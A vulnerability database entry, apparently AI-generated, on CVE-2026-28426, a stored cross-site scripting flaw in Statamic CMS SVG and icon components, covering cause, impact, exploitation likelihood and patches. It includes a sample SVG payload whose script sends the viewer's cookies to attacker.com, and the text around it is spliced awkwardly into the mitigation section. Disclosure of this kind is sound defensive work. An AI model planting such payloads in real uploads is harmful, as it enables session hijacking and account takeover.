
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-28426 is a stored cross-site scripting (XSS) vulnerability in Statamic CMS, a Laravel and Git-powered content management system, that enables privilege escalation by allowing authenticated users to inject malicious JavaScript into SVG and icon-related components. The injected script executes in the browser context of higher-privileged users (e.g., administrators) who view the compromised content. Affected versions include all Statamic releases prior to 5.73.11 (v5.x branch) and versions 6.0.0 through 6.3.x (prior to 6.4.0). The vulnerability was published on February 27, 2026, with patches released the same day. It carries a CVSS v3.1 base score of 8.7 (High) per the GitHub Security Advisory (Github Advisory, Statamic Advisory).
The root cause is improper neutralization of user-supplied input in SVG and icon-related components before rendering in the Statamic Control Panel (CWE-79). An authenticated user with permissions to upload or modify SVG assets or icon configurations can embed malicious JavaScript within SVG markup, which is then stored server-side and rendered unsanitized when viewed by other users. The fix in v5.73.11 and v6.4.0 includes explicit SVG sanitization (PR #14077 "Sanitize SVGs" and PR #14075 "Sanitize SVGs in Icon component"), as well as Antlers template engine hardening to prevent template injection chaining (Statamic Advisory, v5.73.11 Release, v6.4.0 Release). A technical write-up on dev.to describes a potential "chain reaction" scenario combining the stored XSS with Antlers template injection in the Control Panel.
Successful exploitation allows an attacker with low-level authenticated access to persistently inject JavaScript that executes in the browser session of higher-privileged users, including administrators. This can result in session hijacking, theft of administrative credentials, unauthorized modification of CMS content, and potentially full compromise of the Statamic CMS instance. Confidentiality and integrity impacts are rated High in the vendor's CVSS assessment, as an attacker could exfiltrate sensitive data or make unauthorized changes with administrator-level privileges (Github Advisory, Statamic Advisory).
No public proof-of-concept exploit code has been identified, and there is no evidence of in-the-wild exploitation at this time (Github Advisory). The EPSS score is approximately 0.013% (2nd percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with SVG/icon upload or modification permissions, limiting the attacker pool, though the impact upon successful exploitation is significant due to the privilege escalation potential.
<svg xmlns="http://www.w3.org/2000/svg">
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>
</svg><script> tags, javascript: URIs, event handlers (e.g., onload, onerror), or encoded JavaScript payloads within SVG markup.Statamic has released patched versions 5.73.11 (for the v5.x branch) and 6.4.0 (for the v6.x branch), both published on February 27, 2026. Upgrading to one of these versions is the primary recommended remediation (v5.73.11 Release, v6.4.0 Release). As interim mitigations prior to patching: restrict SVG upload and icon modification permissions to only fully trusted users; implement Content Security Policy (CSP) headers to limit JavaScript execution scope; and audit existing SVG assets and icon configurations for suspicious embedded content. Monitoring administrator activity for unauthorized changes is also advised.
The vulnerability was noted by several vulnerability tracking platforms and security news outlets shortly after disclosure, including The Hacker Wire and Bluesky security community accounts (Github Advisory). A dev.to post described a potential "chain reaction" attack combining the stored XSS with Antlers template injection, highlighting the broader security hardening included in the patch releases. Community reaction has been moderate, consistent with a CMS-specific vulnerability requiring authenticated access.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."